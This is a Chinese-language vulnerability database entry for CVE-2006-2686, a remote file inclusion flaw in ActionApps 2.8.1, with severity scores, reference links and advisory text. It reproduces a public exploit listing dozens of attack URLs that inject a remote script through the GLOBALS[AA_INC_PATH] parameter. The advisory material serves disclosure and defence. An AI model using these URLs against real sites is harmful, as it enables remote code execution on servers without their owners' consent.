CVE-2006-2686
CVSS6.4
发布时间 :2006-05-31 06:06:00
修订时间 :2011-08-23 00:00:00
NMCOES    

[原文]PHP remote file inclusion vulnerabilities in ActionApps 2.8.1 allow remote attackers to execute arbitrary PHP code via a URL in the GLOBALS[AA_INC_PATH] parameter in (1) cached.php3, (2) cron.php3, (3) discussion.php3, (4) filldisc.php3, (5) filler.php3, (6) fillform.php3, (7) go.php3, (8) hiercons.php3, (9) jsview.php3, (10) live_checkbox.php3, (11) offline.php3, (12) post2shtml.php3, (13) search.php3, (14) slice.php3, (15) sql_update.php3, (16) view.php3, (17) multiple files in the (18) admin/ folder, (19) includes folder, and (20) modules/ folder.


[CNNVD]ActionApps GLOBALS[AA_INC_PATH]变量 远程文件包含漏洞(CNNVD-200605-582)

        ActionApps是一款基于Web的协作内容发布系统。
        ActionApps处理用户请求时存在输入验证漏洞,远程攻击者可能利用此漏洞在服务器上以Web进程权限执行任意命令。
        ActionApps的多个脚本没有正确验证GLOBALS[AA_INC_PATH]参数的输入,允许攻击者通过包含本地或外部资源的任意文件导致执行任意PHP代码。
        

- CVSS (基础分值)

CVSS分值: 6.4 [中等(MEDIUM)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: NONE [对系统可用性无影响]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: NETWORK [攻击者不需要获取内网访问权或本地访问权]
身份认证: NONE [漏洞利用无需身份认证]

- CWE (弱点类目)

CWE-94 [对生成代码的控制不恰当(代码注入)]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2686
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-2686
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200605-582
(官方数据源) CNNVD

- 其它链接及资源

http://www.vupen.com/english/advisories/2006/1997
(UNKNOWN)  VUPEN  ADV-2006-1997
http://www.osvdb.org/27310
(UNKNOWN)  OSVDB  27310
http://www.osvdb.org/27305
(UNKNOWN)  OSVDB  27305
http://www.osvdb.org/27304
(UNKNOWN)  OSVDB  27304
http://www.osvdb.org/27303
(UNKNOWN)  OSVDB  27303
http://www.osvdb.org/27302
(UNKNOWN)  OSVDB  27302
http://www.osvdb.org/27301
(UNKNOWN)  OSVDB  27301
http://www.osvdb.org/27300
(UNKNOWN)  OSVDB  27300
http://www.osvdb.org/27298
(UNKNOWN)  OSVDB  27298
http://www.osvdb.org/27297
(UNKNOWN)  OSVDB  27297
http://www.osvdb.org/27296
(UNKNOWN)  OSVDB  27296
http://www.osvdb.org/27295
(UNKNOWN)  OSVDB  27295
http://www.osvdb.org/27294
(UNKNOWN)  OSVDB  27294
http://www.osvdb.org/27293
(UNKNOWN)  OSVDB  27293
http://www.osvdb.org/27292
(UNKNOWN)  OSVDB  27292
http://www.osvdb.org/27288
(UNKNOWN)  OSVDB  27288
http://www.osvdb.org/27287
(UNKNOWN)  OSVDB  27287
http://www.osvdb.org/27286
(UNKNOWN)  OSVDB  27286
http://www.osvdb.org/27285
(UNKNOWN)  OSVDB  27285
http://www.osvdb.org/27284
(UNKNOWN)  OSVDB  27284
http://www.osvdb.org/27283
(UNKNOWN)  OSVDB  27283
http://www.osvdb.org/27282
(UNKNOWN)  OSVDB  27282
http://www.osvdb.org/27281
(UNKNOWN)  OSVDB  27281
http://www.osvdb.org/27280
(UNKNOWN)  OSVDB  27280
http://www.osvdb.org/27279
(UNKNOWN)  OSVDB  27279
http://www.osvdb.org/27278
(UNKNOWN)  OSVDB  27278
http://www.osvdb.org/27277
(UNKNOWN)  OSVDB  27277
http://www.osvdb.org/27276
(UNKNOWN)  OSVDB  27276
http://www.osvdb.org/27275
(UNKNOWN)  OSVDB  27275
http://www.osvdb.org/27274
(UNKNOWN)  OSVDB  27274
http://www.osvdb.org/27273
(UNKNOWN)  OSVDB  27273
http://www.osvdb.org/27272
(UNKNOWN)  OSVDB  27272
http://www.osvdb.org/27270
(UNKNOWN)  OSVDB  27270
http://www.osvdb.org/27269
(UNKNOWN)  OSVDB  27269
http://www.osvdb.org/27268
(UNKNOWN)  OSVDB  27268
http://www.osvdb.org/27267
(UNKNOWN)  OSVDB  27267
http://www.osvdb.org/27266
(UNKNOWN)  OSVDB  27266
http://www.osvdb.org/27265
(UNKNOWN)  OSVDB  27265
http://www.osvdb.org/27264
(UNKNOWN)  OSVDB  27264
http://www.osvdb.org/27263
(UNKNOWN)  OSVDB  27263
http://www.osvdb.org/27262
(UNKNOWN)  OSVDB  27262
http://www.osvdb.org/27261
(UNKNOWN)  OSVDB  27261
http://www.osvdb.org/27260
(UNKNOWN)  OSVDB  27260
http://www.osvdb.org/27259
(UNKNOWN)  OSVDB  27259
http://www.osvdb.org/27258
(UNKNOWN)  OSVDB  27258
http://www.osvdb.org/27257
(UNKNOWN)  OSVDB  27257
http://www.osvdb.org/27256
(UNKNOWN)  OSVDB  27256
http://www.osvdb.org/27254
(UNKNOWN)  OSVDB  27254
http://www.osvdb.org/27253
(UNKNOWN)  OSVDB  27253
http://secunia.com/advisories/20299
(VENDOR_ADVISORY)  SECUNIA  20299
http://milw0rm.com/exploits/1829
(UNKNOWN)  MILW0RM  1829
http://xforce.iss.net/xforce/xfdb/26776
(UNKNOWN)  XF  actionapps-globals-file-include(26776)
http://www.securityfocus.com/bid/19133
(UNKNOWN)  BID  19133
http://www.osvdb.org/27309
(UNKNOWN)  OSVDB  27309
http://www.osvdb.org/27308
(UNKNOWN)  OSVDB  27308
http://www.osvdb.org/27306
(UNKNOWN)  OSVDB  27306
http://www.osvdb.org/27299
(UNKNOWN)  OSVDB  27299
http://www.osvdb.org/27291
(UNKNOWN)  OSVDB  27291
http://www.osvdb.org/27290
(UNKNOWN)  OSVDB  27290
http://www.osvdb.org/27289
(UNKNOWN)  OSVDB  27289
http://www.osvdb.org/27271
(UNKNOWN)  OSVDB  27271

- 漏洞信息

ActionApps GLOBALS[AA_INC_PATH]变量 远程文件包含漏洞
中危 代码注入
2006-05-31 00:00:00 2007-08-13 00:00:00
远程  
        ActionApps是一款基于Web的协作内容发布系统。
        ActionApps处理用户请求时存在输入验证漏洞,远程攻击者可能利用此漏洞在服务器上以Web进程权限执行任意命令。
        ActionApps的多个脚本没有正确验证GLOBALS[AA_INC_PATH]参数的输入,允许攻击者通过包含本地或外部资源的任意文件导致执行任意PHP代码。
        

- 公告与补丁

        目前厂商还没有提供补丁或者升级程序,建议使用此软件的用户随时关注厂商的主页以获取最新版本:
        http://actionapps.org/en/Main_Page

- 漏洞信息 (1829)

APC ActionApps CMS 2.8.1 Remote File Include Vulnerabilities (EDBID:1829)
php webapps
2006-05-25 Verified
0 Kacper
N/A [点击下载]
################ DEVIL TEAM THE BEST POLISH TEAM #################
#APC ActionApps CMS (2.8.1) - Remote File Include Vulnerabilities
#Find by Kacper (Rahim).
#Greetings For ALL DEVIL TEAM members, Special DragonHeart :***
#Contact: kacper1964@yahoo.pl   or   http://www.devilteam.yum.pl
#site: http://sourceforge.net/projects/apc-aa/
##################################################################
/*
cached.php3:
... (line:35)
require_once $GLOBALS['AA_INC_PATH']."locsess.php3";
...

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

cron.php3:
... (line:47)
require_once $GLOBALS['AA_INC_PATH']."locsess.php3";
...

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

discussion.php3:
... (line:80)
require_once $GLOBALS['AA_INC_PATH']."easy_scroller.php3";
...

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

filldisc.php3:
... (line:75)
require_once $GLOBALS['AA_INC_PATH']."locsess.php3";
...

And more.......... ;-)

*/

expl:

http://www.site.com/[APC_path]/cached.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]

http://www.site.com/[APC_path]/cron.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]

http://www.site.com/[APC_path]/discussion.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]

http://www.site.com/[APC_path]/filldisc.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]

http://www.site.com/[APC_path]/filler.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]

http://www.site.com/[APC_path]/fillform.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]

http://www.site.com/[APC_path]/go.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]
http://www.site.com/[APC_path]/hiercons.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]

http://www.site.com/[APC_path]/jsview.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]

http://www.site.com/[APC_path]/live_checkbox.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]

http://www.site.com/[APC_path]/offline.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]

http://www.site.com/[APC_path]/post2shtml.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]

http://www.site.com/[APC_path]/search.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]

http://www.site.com/[APC_path]/slice.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]

http://www.site.com/[APC_path]/sql_update.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]

http://www.site.com/[APC_path]/view.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]


/*
In Admin/ folder all files have:

require_once "include/config.php3";
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
include/config.php3: on line 79

require_once $GLOBALS['AA_INC_PATH']."mgettext.php3";

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

only this file: logout.php3, prev_navigation.php3, preview.php3, dont
have this verbilities

All can expl:


http://www.site.com/[APC_path]/admin/[any_file]?GLOBALS[AA_INC_PATH]=[evil_scripts]


*/
in includes/ folder:


http://www.site.com/[APC_path]/include/auth.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]

http://www.site.com/[APC_path]/include/constants.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]

http://www.site.com/[APC_path]/include/csn_util.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]

http://www.site.com/[APC_path]/include/discussion.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]

http://www.site.com/[APC_path]/include/event.class.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]

http://www.site.com/[APC_path]/include/event_handler.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]

http://www.site.com/[APC_path]/include/extauth.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]

http://www.site.com/[APC_path]/include/extauthnobody.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]

http://www.site.com/[APC_path]/include/feeding.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]

http://www.site.com/[APC_path]/include/fileman.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]

http://www.site.com/[APC_path]/include/formutil.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]

http://www.site.com/[APC_path]/include/item.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]

http://www.site.com/[APC_path]/include/item_content.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]

http://www.site.com/[APC_path]/include/itemfunc.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]

http://www.site.com/[APC_path]/include/itemview.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]

http://www.site.com/[APC_path]/include/javascript.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]

http://www.site.com/[APC_path]/include/mail.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]

http://www.site.com/[APC_path]/include/mailman.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]

http://www.site.com/[APC_path]/include/menu.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]

http://www.site.com/[APC_path]/include/notify.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]

http://www.site.com/[APC_path]/include/pagecache.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]

http://www.site.com/[APC_path]/include/perm_sql.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]

http://www.site.com/[APC_path]/include/profile.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]

http://www.site.com/[APC_path]/include/searchbar.class.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]

http://www.site.com/[APC_path]/include/searchlib.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]

http://www.site.com/[APC_path]/include/slicedit.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]

http://www.site.com/[APC_path]/include/sliceobj.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]

http://www.site.com/[APC_path]/include/slicewiz.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]

http://www.site.com/[APC_path]/include/stringexpand.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]

http://www.site.com/[APC_path]/include/tabledit.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]

http://www.site.com/[APC_path]/include/tabledit_util.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]

http://www.site.com/[APC_path]/include/tv_email.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]

http://www.site.com/[APC_path]/include/tv_misc.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]

http://www.site.com/[APC_path]/include/um_uedit.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]

http://www.site.com/[APC_path]/include/um_util.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]

http://www.site.com/[APC_path]/include/view.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]

http://www.site.com/[APC_path]/include/xml_fetch.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]

http://www.site.com/[APC_path]/include/xml_rssparse.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]

http://www.site.com/[APC_path]/include/zids.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]


/*
and more verbs in modules/ folder :)
*/

###################################################################
#Elo ;-)

# milw0rm.com [2006-05-25]
		

- 漏洞信息

27253
ActionApps include/config.php3 GLOBALS[AA_INC_PATH] Parameter Remote File Inclusion
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public

- 漏洞描述

ActionApps contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the include/config.php3 script not properly sanitizing user input supplied to the 'GLOBALS[AA_INC_PATH]' variable. The script is called by many of the files in the /admin/ directory. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.

- 时间线

2006-05-25 Unknow
Unknow Unknow

- 解决方案

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

- 相关参考

- 漏洞作者

- 漏洞信息

ActionApps Multiple Remote File Include Vulnerabilities
Input Validation Error 19133
Yes No
2006-07-24 12:00:00 2006-07-27 07:52:00
Kacper is credited with the discovery of these vulnerabilities.

- 受影响的程序版本

ActionApps ActionApps 2.8.1
ActionApps ActionApps 2.10

- 不受影响的程序版本

ActionApps ActionApps 2.10

- 漏洞讨论

ActionApps is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input.

An attacker can exploit these issues to include an arbitrary remote file containing malicious PHP code and execute it in the context of the webserver process. This may allow the attacker to compromise the application and the underlying system; other attacks are also possible.

These issues affect version 2.8.1; other versions may also be vulnerable.

- 漏洞利用

Attackers can exploit these issues via a web client.

- 解决方案

The vendor has released version 2.10.0 to address this issue; please contact the vendor for more information.

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站